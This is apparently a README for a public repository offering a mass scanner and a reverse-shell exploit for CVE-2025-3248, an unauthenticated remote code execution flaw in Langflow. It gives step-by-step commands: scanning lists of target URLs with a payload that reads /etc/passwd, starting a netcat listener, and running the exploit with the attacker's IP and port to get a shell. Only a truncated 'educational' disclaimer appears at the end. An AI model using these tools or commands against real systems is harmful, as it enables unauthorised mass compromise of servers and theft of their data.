CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE) This repository contains two Python scripts: – LangflowCheck.py: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248. – exploit.py: A working reverse shell exploit for vulnerable Langflow targets. Summary CVE-2025-3248 is a critical vulnerability in Langflow AI that allows unauthenticated attackers to execute arbitrary Python code remotely via a crafted payload to /api/v1/validate/code. Files LangflowCheck.py Checks if a target is vulnerable by attempting to execute a harmless payload that reads /etc/passwd. Can scan a single target or a list of URLs. Supports outputting vulnerable targets to a file. exploit.py Sends a reverse shell payload to the vulnerable endpoint. Requires attacker IP (lhost) and listener port (lport). Logs activity to exploit.log. Supports listener check before sending payload. Usage 1. Install Requirements bash pip install -r requirements.txt 2. Run Vulnerability Scanner Single URL “`bash python3 LangflowCheck.py –url https://target.com –output vulnerable_target.txt ““ Multiple Targets bash python3 LangflowCheck.py –file targets.txt –output vulnerable_targets.txt 3. Exploit a Target First, start a listener bash sudo nc -nvlp 4444 Then, run the exploit: bash python3 exploit.py –target https://target.com –lhost YOUR_IP –lport 4444 You should receive a shell if the target is vulnerable. ⚠️ Disclaimer This exploit is for educational and…Read More